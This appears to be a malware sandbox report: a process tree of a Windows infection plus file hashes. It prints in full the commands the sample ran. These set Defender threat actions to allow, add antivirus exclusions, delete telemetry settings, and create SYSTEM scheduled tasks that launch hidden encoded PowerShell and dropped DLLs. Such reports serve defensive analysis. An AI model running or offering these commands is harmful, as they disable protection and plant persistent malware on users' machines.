C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4172
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2872
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyLrXeBYgDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyLrXeBYgDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KlxBVdQvPHUU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KlxBVdQvPHUU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prTKcPnPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prTKcPnPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wfePzGzbIQGEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wfePzGzbIQGEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kLiGIkXWiwtEPvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kLiGIkXWiwtEPvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EpsxxpNsmYaigCcr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EpsxxpNsmYaigCcr\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:323⤵PID:3648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:324⤵PID:2344
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:643⤵PID:4020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:323⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:643⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:323⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:643⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:643⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:323⤵PID:4124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:643⤵PID:3908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kLiGIkXWiwtEPvVB /t REG_DWORD /d 0 /reg:323⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kLiGIkXWiwtEPvVB /t REG_DWORD /d 0 /reg:643⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR /t REG_DWORD /d 0 /reg:323⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR /t REG_DWORD /d 0 /reg:643⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EpsxxpNsmYaigCcr /t REG_DWORD /d 0 /reg:323⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EpsxxpNsmYaigCcr /t REG_DWORD /d 0 /reg:643⤵PID:4428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbUoPMylo" /SC once /ST 00:45:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbUoPMylo"2⤵PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbUoPMylo"2⤵PID:2116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zZBlWYGpCEMqhJzIS" /SC once /ST 05:54:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\cLAQmew.exe\" E7 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "zZBlWYGpCEMqhJzIS"2⤵PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3796
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1344
-
C:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\cLAQmew.exeC:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\cLAQmew.exe E7 /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKcODTUCyUvoWvuOBb"2⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3140
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4396
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1256
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prTKcPnPU\GpWuqt.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SOnJrQRHBOIzCQS" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SOnJrQRHBOIzCQS2" /F /xml "C:\Program Files (x86)\prTKcPnPU\gHHQXwG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SOnJrQRHBOIzCQS"2⤵PID:4020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SOnJrQRHBOIzCQS"2⤵PID:3084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NanqrZdOvBkKdb" /F /xml "C:\Program Files (x86)\KlxBVdQvPHUU2\yklPGcQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KDBksqNqUAzza2" /F /xml "C:\ProgramData\kLiGIkXWiwtEPvVB\Pqaarvx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OOCvtUPQSCmMEpvCH2" /F /xml "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\MgIdusR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JamLqGqmcktsvGiVIJC2" /F /xml "C:\Program Files (x86)\wfePzGzbIQGEC\atAwCbC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uDKngRYOrVZAGISPK" /SC once /ST 02:17:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EpsxxpNsmYaigCcr\BZFJLuxV\EUYXBkL.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uDKngRYOrVZAGISPK"2⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3420
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4448
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zZBlWYGpCEMqhJzIS"2⤵PID:2408
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EpsxxpNsmYaigCcr\BZFJLuxV\EUYXBkL.dll",#1 /site_id 5254031⤵PID:3852
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EpsxxpNsmYaigCcr\BZFJLuxV\EUYXBkL.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uDKngRYOrVZAGISPK"3⤵PID:880
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55d234664b1264fa4329821220d11bec8
SHA1ad9d025bc7bb7c52dbb61f475e6bd5484764b6f6
SHA256e9c8430594250e2322a80cdfcc4a49b52643ef64a1318ea3d33ab53b07fd2321
SHA512842e1f8625e1b976fd11c05680379b037d41b2766752028d1a7f34480e1bc88b5e7d2f5cd9e8125125c3245980343f91c028f8aaf0e874a492f1fcd8c98865c9
-
Filesize
2KB
MD59f1652d019857483a55a9ee38c3e43b4
SHA1f71290e1b65b20efc8e636da5cfa4bd49e943f66
SHA2568e4880d2d1239c2264fb9bd024cc1dac79da691c30e332296822a0ce16ec2682
SHA5124c5b4a726de91316640950ea38863262d0840a23f35b39264949eed1f2eaca7d319a16b603d62dd6b5b311489f3ef434bd2742d2d93002e3b1c2a73a15fc09da
-
Filesize
2KB
MD5e71d9b5d5d1480ac06f134a84594b7f7
SHA132093263031ff611c5410cebbe653c04ee6d1afc
SHA256baa30cc6420d80d9f44b987786ebda1a44cb59e094ce41d506bbc8aba1328b4f
SHA512b0a890d07ae4c25fa3c5cd1207a1db1c4905cd16969fbe50f41b9faac411465c2c4a657ff4be3e359c297f09e5eb0b7f3f759fb06fa011c95e4d06cea148390f
-
Filesize
2KB
MD55434abceee491f53297702a2e230df5e
SHA1e545ea1df173b868fc43663222c0002c5d040a63
SHA2561bd2e182bbcefee86c2acf212e24ba56adc75d264dd5bbc5f6cf53f44fde0710
SHA512ab09d94e2e6f5bf75b6ea929b07d91d5fcfb7caebc77cd992d37c5ba117e09cd48f87cda751c670fb9998d1099e3f51fc256fd450b82fbb5eca907f4765f2aab
-
Filesize
2KB
MD5578311ec76b7512a11fd4be141246a15
SHA12259d9c9a0dbdb87c94d01b0be2ca58318fb589a
SHA25675879185a7cb19578a41c0cb8062f1bb758fb7c78efc61d8598fae7ff3fdd49b
SHA5128d2315779ec41eedee7eeb7adb4c4b0c018ce008e6647255f72292c7f96e8f44b484df0747a5b1151babe3c193cbfabaa051cdc5f4cf86c857047aa72caac72e
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.3MB
MD53288d27921261defdb1882f066a52d84
SHA128aecee5a6f600cca7530f9aa19def45ae19cbf4
SHA25695d440b9a48d35de8ed51f7fa761f4215bcd1cedcb579cd52eb4612562ababd0
